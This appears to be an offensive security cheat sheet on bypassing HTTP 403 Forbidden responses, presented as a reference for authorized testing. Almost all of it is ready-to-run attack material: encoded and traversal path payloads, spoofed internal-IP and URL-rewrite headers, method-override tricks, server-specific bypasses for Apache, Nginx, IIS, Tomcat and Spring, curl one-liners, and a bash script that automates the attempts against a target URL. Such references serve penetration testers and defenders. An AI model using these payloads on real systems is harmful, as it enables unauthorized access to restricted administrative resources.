403-BYPASS
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
Methods to bypass HTTP 403 Forbidden responses through header manipulation, path traversal tricks, method switching, and protocol-level techniques.
PATH MANIPULATION#
# Case variation GET /admin # 403 GET /Admin # Try GET /ADMIN # Try GET /aDmIn # Try # Path traversal GET /admin # 403 GET /./admin # Try GET /admin/. # Try GET //admin # Try GET /admin/ # Try GET /admin// # Try GET /.//admin # Try # URL encoding GET /%61dmin # 'a' encoded GET /ad%6din # 'm' encoded GET /%61%64%6d%69%6e # Full encode GET /admin%20 # Trailing space GET /admin%09 # Trailing tab GET /admin%00 # Null byte GET /admin%0a # Newline GET /admin%0d # Carriage return # Double URL encoding GET /%2561dmin # Double-encoded 'a' GET /%252fadmin # Double-encoded '/' # Unicode / UTF-8 encoding GET /admi%C0%AEn # Overlong UTF-8 GET /%C0%AFadmin # Overlong slash GET /admin%E2%80%8B # Zero-width space GET /admin%EF%BB%BF # BOM character # Path normalization tricks GET /admin..;/ # Semicolon GET /admin;/ # Semicolon GET /admin/..;/admin # Traversal via semicolon GET /../admin # Parent directory GET /admin/../admin # Self-referencing GET /./admin/./ # Dot segments GET /admin.json # Extension tricks GET /admin.html # Extension tricks GET /admin? # Empty query GET /admin?? # Double query GET /admin# # Fragment GET /admin/* # Wildcard GET /admin.php # Add extension # Backslash (IIS/Windows) GET /admin\ # Backslash GET \admin # Leading backslash GET /admin\. # Backslash dot # Add trailing characters GET /admin/~ # Tilde GET /admin/! # Exclamation GET /admin/.randomstring # Dot + random
HEADER MANIPULATION#
# IP-based bypass (pretend to be internal/trusted) X-Forwarded-For: 127.0.0.1 X-Forwarded-For: localhost X-Forwarded-For: 10.0.0.1 X-Forwarded-For: 192.168.1.1 X-Forwarded-For: 0.0.0.0 X-Real-IP: 127.0.0.1 X-Originating-IP: 127.0.0.1 X-Remote-IP: 127.0.0.1 X-Remote-Addr: 127.0.0.1 X-Client-IP: 127.0.0.1 True-Client-IP: 127.0.0.1 Cluster-Client-IP: 127.0.0.1 X-Cluster-Client-IP: 127.0.0.1 Forwarded: for=127.0.0.1 Forwarded-For: 127.0.0.1 X-ProxyUser-Ip: 127.0.0.1 Via: 1.0 localhost X-Host: 127.0.0.1 X-Custom-IP-Authorization: 127.0.0.1 # URL rewrite headers X-Original-URL: /admin X-Rewrite-URL: /admin X-Custom-URL: /admin # Host header tricks Host: localhost Host: 127.0.0.1 Host: internal.target.com Host: target.com:8080 Host: target.com\r\nX-Forwarded-For: 127.0.0.1 # Referer tricks Referer: https://target.com/admin Referer: https://localhost/admin # Content-Type manipulation Content-Type: application/json Content-Type: application/xml Content-Type: application/x-www-form-urlencoded Content-Type: text/plain
HTTP METHOD SWITCHING#
# Standard methods GET /admin → 403 POST /admin → Try PUT /admin → Try DELETE /admin → Try PATCH /admin → Try HEAD /admin → Try OPTIONS /admin → Try (may reveal allowed methods) TRACE /admin → Try (may leak info) CONNECT /admin → Try # Method override headers (when server accepts overrides) X-HTTP-Method: PUT X-HTTP-Method-Override: PUT X-Method-Override: PUT # With override header GET /admin HTTP/1.1 X-HTTP-Method-Override: POST
PROTOCOL & VERSION TRICKS#
# HTTP version downgrade GET /admin HTTP/1.0 # Try HTTP/1.0 GET /admin HTTP/0.9 # Try HTTP/0.9 # HTTP/2 specific # Some reverse proxies handle HTTP/2 differently # Try forcing HTTP/1.1 vs HTTP/2 # HTTPS vs HTTP # If 403 on HTTPS, try HTTP (or vice versa) # Different backend handling
TECHNOLOGY-SPECIFIC BYPASSES#
# Apache GET /admin # 403 GET /admin/ # Try GET /admin/. # Try GET //admin # Try # Nginx GET /admin # 403 GET /Admin # Case-sensitive GET /admin../ # Path confusion GET /admin%20/ # Trailing space # IIS GET /admin # 403 GET /admin\ # Backslash GET /admin%20 # Short filename GET /admin::$DATA # Alternate data stream GET /admin.aspx # Add extension # Tomcat / Java GET /admin # 403 GET /admin/..;/admin # Semicolon traversal GET /admin;.css # Extension after semicolon GET /admin;param=value # Parameter injection # Spring Boot GET /admin # 403 GET /admin.json # Suffix pattern GET /admin/ # Trailing slash GET /admin;jsessionid=x # Session param # Node.js / Express GET /admin # 403 GET /Admin # Case variation GET /admin%2f # Encoded slash
CURL TESTING#
# Quick 403 bypass testing
# Path tricks
curl -s -o /dev/null -w "%{http_code}" https://target.com/admin
curl -s -o /dev/null -w "%{http_code}" https://target.com/Admin
curl -s -o /dev/null -w "%{http_code}" https://target.com/admin/
curl -s -o /dev/null -w "%{http_code}" https://target.com//admin
curl -s -o /dev/null -w "%{http_code}" https://target.com/./admin
curl -s -o /dev/null -w "%{http_code}" https://target.com/admin..;/
# Header tricks
curl -s -o /dev/null -w "%{http_code}" -H "X-Forwarded-For: 127.0.0.1" https://target.com/admin
curl -s -o /dev/null -w "%{http_code}" -H "X-Original-URL: /admin" https://target.com/
curl -s -o /dev/null -w "%{http_code}" -H "X-Rewrite-URL: /admin" https://target.com/
# Method switching
curl -s -o /dev/null -w "%{http_code}" -X POST https://target.com/admin
curl -s -o /dev/null -w "%{http_code}" -X PUT https://target.com/admin
curl -s -o /dev/null -w "%{http_code}" -X OPTIONS https://target.com/admin
AUTOMATED TOOLS#
# 403bypasser python3 403bypasser.py -u https://target.com/admin # bypass-403 (Go) go install github.com/iamj0ker/bypass-403@latest bypass-403 https://target.com/admin # dirsearch with 403 bypass dirsearch -u https://target.com -w wordlist.txt --header "X-Forwarded-For: 127.0.0.1" # Burp extensions # 403 Bypasser (BApp Store) # Bypass WAF (BApp Store)
BASH AUTOMATION SCRIPT#
#!/bin/bash
URL="$1"
echo "[*] Testing 403 bypass for: $URL"
# Path variations
for path in "/" "/." "//" "%20" "%09" "..;/" ";/" "?" "#"; do
code=$(curl -s -o /dev/null -w "%{http_code}" "${URL}${path}")
echo " ${URL}${path} → $code"
done
# Header bypass
for header in "X-Forwarded-For: 127.0.0.1" "X-Original-URL: ${URL##*/}" "X-Rewrite-URL: ${URL##*/}"; do
code=$(curl -s -o /dev/null -w "%{http_code}" -H "$header" "$URL")
echo " Header: $header → $code"
done
# Method bypass
for method in POST PUT PATCH DELETE OPTIONS TRACE; do
code=$(curl -s -o /dev/null -w "%{http_code}" -X "$method" "$URL")
echo " Method: $method → $code"
done
TIPS#
- Try multiple techniques in combination (header + path) - X-Original-URL and X-Rewrite-URL work on some reverse proxies - Semicolon tricks are highly effective against Tomcat/Java - Always try both with and without trailing slash - Case sensitivity matters on Linux servers (not Windows/IIS) - Check OPTIONS response for allowed methods - Method override headers bypass frontend but hit backend - URL encoding tricks exploit parser differentials - Double encoding catches intermediate proxy decoding - Test both HTTP/1.0 and HTTP/1.1 - Not all 403s are bypassable; some are legitimate ACLs - Document bypass method for reproducibility in reports